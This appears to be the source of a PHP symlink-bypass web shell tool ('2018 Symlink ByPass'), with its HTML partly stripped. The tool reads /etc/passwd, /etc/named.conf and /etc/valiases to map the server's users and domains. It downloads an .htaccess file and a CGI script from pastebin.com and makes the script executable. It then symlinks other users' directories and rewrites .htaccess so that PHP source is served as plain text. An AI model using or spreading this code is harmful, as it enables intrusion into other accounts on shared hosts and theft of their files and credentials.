ICA

2018 Symlink ByPass

Symlink

"; if(!is_file('DATA.txt')){ $named = @file("/etc/named.conf"); }else{ $named = @file("DATA.txt"); } if(!$named) { die ("

ERROR !

"); } else { foreach($named as $dom){ preg_match_all('#zone "(.*)"#', $dom, $doms); if(strlen(trim($doms[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$doms[1][0])); echo ""; } } } break; case '2'; echo "
DomainsUserSym
".$doms[1][0]."".$user['name']."Sym1~Sym2~Sym3~Sym4~Sym5~Sym6~Sym7

"; $file = file('/etc/passwd'); if(!$file) { die ("

ERROR !

"); } else { foreach ($file as $f){ $u=explode(':', $f); $user = $u['0']; echo ""; } } break; case '3'; $dir = 'SYM'; @mkdir($dir); if($dir){ echo '
SYM Has Been Created ~'; } else { echo '
[-] Error !'; } $htaccess = 'http://pastebin.com/raw.php?i=XBLhdvbQ'; $file = file_get_contents($htaccess); $open = fopen('SYM/.htaccess' , 'w'); fwrite($open,$file); fclose($open); if($open) { echo '
[htaccess] => Has Been Created ~'; } else { echo "
[+] Error !"; } $con = 'http://pastebin.com/raw.php?i=sk8JEgq0'; $file = file_get_contents($con); $open = fopen('SYM/con.cpc' , 'w'); fwrite($open,$file); fclose($open); if($open) { echo '
[cgi] => Has Been Created !'; } else { echo '
[-] Error !'; } $ch = 'SYM/con.cpc'; chmod($ch, 0755); if($cgip){ echo '
[+] => CHMOD To 755 Complate ~'; } else { } echo (''); echo ('Please Whait . '); break; case '4'; mkdir("CONSYM"); chdir("CONSYM"); $temp = ""; $val1 = 0; $val2 = 1000; for(; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)." "; } echo '
'; $temp = trim($temp); $file5 = fopen("SYMTMP.txt","w"); fputs($file5,$temp); fclose($file5); $file = fopen("SYMTMP.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); $ht = 'Options Indexes FollowSymLinks Options +Indexes AddType txt .php AddHandler txt .php'; $open2 = fopen('.htaccess' , 'w'); fwrite($open2,$ht); fclose($open2); echo "
UserSym
".$user."Sym1~Sym2~Sym3~Sym4~Sym5~Sym6~Sym7
"; unlink("SYMTMP.txt"); echo (''); break; } } else { echo "
"; echo "
"; echo "
2018 Symlink ByPass
"; } ?>